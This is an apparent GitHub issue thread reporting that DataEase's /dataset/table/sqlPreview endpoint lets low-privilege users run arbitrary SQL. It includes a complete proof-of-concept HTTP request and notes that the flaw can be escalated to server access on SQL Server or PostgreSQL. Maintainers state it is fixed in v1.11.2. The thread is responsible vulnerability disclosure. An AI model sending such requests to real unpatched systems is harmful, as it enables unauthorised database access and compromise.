### ISSUE TITLE
[Bug]任意SQL代码执行

### ISSUE THREAD

**Issue by Ryze-T** [dataease/dataease#2430]
**DataEase 版本**
最新版

**运行方式(安装包运行 or 源码运行 ?)**
安装包运行

**浏览器版本**
任意

**Bug 描述**
任意SQL代码执行

**Bug 重现步骤(有截图更好)**
普通权限用户可调用 /dataset/table/sqlPreview 接口。
实现过程中主要需要两个参数：DataSourceId和 sql，dataSourceId可通过查看数据源获取。
```
POST /dataset/table/sqlPreview  HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: xxx
LINK-PWD-TOKEN: null
Content-Length: 95
Connection: close

{"dataSourceId":"76026997-94f9-4a35-96ca-151084638969","info":"{\"sql\":\"select version()\"}"}
```
<img width="957" alt="image" src="https://user-images.githubusercontent.com/76553352/173776083-15bdc47e-728a-4eb8-9f4e-4d4e939ca577.png">

若数据源为sql server或postgresql等，可以通过数据库提权获取数据库服务器权限。

**Comment by xuwei-fit2cloud** [comment]
感谢反馈，我们尽快修复。

**Comment by maninhill** [comment]
v1.11.2 已修复，详情请参考：https://github.com/dataease/dataease/releases/tag/v1.11.2
